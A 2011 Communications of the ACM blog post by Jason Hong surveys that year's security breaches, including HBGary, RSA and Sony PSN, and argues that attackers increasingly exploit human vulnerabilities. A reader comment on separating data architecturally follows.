Sign In

Communications of the ACM


Why Have There Been So Many Security Breaches Recently?

Carnegie Mellon Associate Professor Jason Hong

We're almost five months into 2011 and we've already seen a large number of sensational security breaches. 

Just to recount, here are some of the breaches just this year:
  • HBGary Federal, a beltway computer security firm, had all of their emails stolen and made available on Bittorrent. This incident also raised a lot of questions about the ethics of the work they were being paid to do in the first place.
  • Computers used by the Australian Prime Minister and other ministers were hacked, given the intruders access to several thousand sensitive emails. 
  • A similar attack happened to computers maintained by the Canadian government, giving the attackers access to classified federal information.
  • Comodo Group had their systems breached, with several fake browser certificates created along the way.
  • Databases used to maintain RSA SecurID tokens were breached using a combination of a spear-phishing attack and a zero-day Flash exploit. 
  • The Epsilon mailing list service, which maintained mailing lists for many large corporations, had their databases hacked, quite possibly through a phishing attack.
  • Oak Ridge National Laboratory was hit by a phishing attack, with some data exfiltrated
  • The PlayStation Network was hacked, with over 65 million accounts compromised, including names, street addresses, email addresses, and purchase histories stolen. It is not clear from Sony's public statement whether credit card and password data was stolen.  
The scary part is, it's only going to get worse.
There's been a rise in the sophistication of attacks over the past years. These attackers, which range from script-kiddies to criminals to state-sponsored cyberwarriors, have been all too successful in breaking into online systems. 
There are two interesting observations here. The first is that these attacks have shifted from just directly attacking a computer system, an attack model that computer security specialists are somewhat good at defending against, towards also exploiting the human vulnerabilities in these systems.
By human vulnerabilities, I mean all of the misunderstandings, laxness, and cognitive and social biases that arise with the people that use computer systems. The list of human vulnerabilities here are numerous: poor interfaces that are hard to understand, interfaces that are easy to misconfigure, guessable passwords, reused passwords, tricking people into installing malware, tricking people into opening up documents (which use zero-day exploits), and on, and on, and on.
These human vulnerabilities are clearly a major weakness, but also a puzzling blindspot both from a research perspective and from an industry perspective. Well, actually, it's not that puzzling. People are messy. We all have a wide range of experiences, knowledge, and motivations, and so it's natural, so tempting to just buy that "magic black box" that claims to solve all your security problems and avoid having to actually deal with the messiness. Just go to any industry conference (like RSA), and you'll see what I mean: vendors selling row after row of magic black boxes. And by doing so, computer professionals can rest comfortably in the conventional wisdom that users are just stupid, keep on blaming the user, and not actually force ourselves to adapt to smarter attackers.
The other observation is that none of these hacks are actually new or innovative (and no, most zero-day attacks are not that innovative, unless you count buffer-overflow attacks as innovative). We don't know yet about the Sony Playstation Network attack, but I'm willing to bet that it didn't use any advanced techniques either. 
Instead, what is fascinating here is the sophistication of the execution. The attackers are more patient, adept at using a wide range of tools, and very capable of progressively exploiting smaller vulnerabilities into larger ones. It's analagous to the transition in martial arts from single schools of thought to cross-training and mixed-martial arts. These recent attacks have been highly creative, flexible to the situation, and make full use of a combination of techniques. 
For example, in the Epsilon case, it looks like the attackers were using spear phishing attacks for several months, trying to bait low level employees at several mailing list companies. While there are few details, there are several interesting questions. How did the attackers know which employees to target? Did the attackers know how to format the spear phishing email so it looked appropriate? Did they know when to send the malware for maximum effect? I suspect the answer to all of these is yes. 
The HBGary case is also an impressive case study. It started with a SQL injection on the company's web site, which led to stealing the password file, running a standard password crack, exploiting password reuse to remotely wipe the (now former) CEO's iPad and access his Twitter account, and a spear phishing to get the password for another site. Again, all standard techniques, just really well executed.
These kinds of security breaches will be a long-term problem that we will be struggling with for the next ten to twenty years. The only effective strategy I see is to take a three-pronged approach. First, get research and industry to develop new best practices, create better tools, and have better training of software developers. Second, complement these technical approaches with a stronger legal structure that can properly incentivize companies to take stronger measures in protecting customer data. Finally, develop new ways of actually addressing the human vulnerabilities, in the form of simpler and better designed user interfaces, more research to gain a deeper understanding of human biases and social influences in decision making, and better ways of motivating and training people so that they are effective in the face of these ongoing attacks. 



James Byrd

The single common thread to the above (and most breaches) is the failure to architecturally separate data. Everything in a lump with access rules is more convenient than designing systems that put what is needed where it is needed. Significant breaches come when somone (or system) has access to more data than they need. Rules can be broken, architectural separation is harder - you have to hop domains not just abuse the rules. It's still possible, it's just a lot more work.

Displaying 1 comment